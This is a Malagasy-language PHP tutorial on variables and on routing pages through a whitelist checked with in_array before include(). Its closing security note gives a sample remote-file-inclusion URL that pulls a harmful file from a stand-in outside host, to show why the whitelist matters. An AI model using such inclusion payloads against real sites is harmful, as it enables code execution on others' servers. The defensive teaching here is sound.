Ity fizarana iray ity dia misy fanazavana somary lalindalina kokoa @ resaka variables fa azonao tonga dia mandeha amin’ny tohin’ny fampiharana ery ambany indrindra.
Teo amin’ilay fampiharana teo aloha dia efa nampiasa variables isika. Ilay $page no variable izay nampiasaina ary ny sandany dia nalaina tamin’ny variable globale iray $_GET.
Ny variable iray dia karazana toerana iray azo ametrahana sanda zavatra maro isankarazany. Azo asiana soratra, isa, arrays na objects isankarazany. Ny fanomezana sanda ny variable iray dia tsotra. Toa izao fotsiny:
$variable = "Soratra"; // raha karazany soratra (string) $variable = 2; // raha karazany isa (integer) $variable = array('anarana', 'fanampiny', 'taona'); // Raha array $variable = new Object; //Raha object.
Ny variable no misolotoerana ilay sanda nomena azy mandritra ny script iray manontolo mandra-piovany.
Izany hoe rehefa natao hoe $x = 2 dia azo antsoina hatrany iny $x iny ary misanda 2 hatrany. Ka raha tiana ovaina ho 3 indray izany ny $x rehetra dia apetraka eo amin’ny toeran’ny $x = 2 fotsiny ny hoe $x = 3.
Ny fampiasana variables matetika dia toa izao:
//... $x = 2; /* Apetraka eto ohatra ilay $x */ echo "colonne = " . $x ; /* Dia ovaina eto ny sandany */ $x = $x +1; /* Dia averina soratana indray */ echo "Colonne = " . $x ; ?>
Toa izao ny zavatra hitranga
Colonne = 2 Colonne = 3
Ny fanazavana lalindalina momba ny variables dia azo alaina eto http://php.net/variables
Tohiny : fampiharana teo aloha
Toa izao no hitantsika teo.
$page = $_GET['page']; //ampidirina izay ilain'ny mpitsidika arakaraky ny page if($page == 'fandraisana') { include('fandraisana.php'); } elseif($page == 'mombamomba') { include('mombamomba.php'); } elseif($page == 'hafatra') { include('hafatra.php'); } else { //tsy ao anatin'izay tadiavina ny page echo "Tsy misy io takelaka io"; }
Koa satria ny variable page dia mety hidika hoe ‘fandraisana’ na ‘mombamomba’ na ‘hafatra’ dia tonga dia azo hafohezina toa izao ilay izy.
$page = $_GET['page']; $authorized_pages = array('fandraisana', 'mombamomba', 'hafatra'); //ampidirina izay ilain'ny mpitsidika arakaraky ny page if(in_array($page, $authorized_pages)) { include( $page . '.php'); } else { //tsy ao anatin'izay tadiavina ny page echo "Tsy misy io takelaka io"; }
Niha fohifohy indray izany izao ilay fichier fampiharana.php izay hohitantsika eto ambany
Fanamarihana
Niniana napetraka teto ilay $authorized_pages mba hialana amin’ny fampiasan’ny olona hafa an’ilay takelaka (Resaka fiarovana).
Raha tsy nisy an’io mantsy dia azon’ny olona nantsoina ny hoe
http://..../fampiharana.php?page=http://sitehafa.com/fichier_mpanimba&
ka raha vao tonga eo amin’ilay hoe
include( $page . '.php');
dia mitovy amin’ny hoe
include('http://..../fampiharana.php?page=http://sitehafa.com/fichier_mpanimba.php');
Tohiny : Conditions / safidy sy fepetra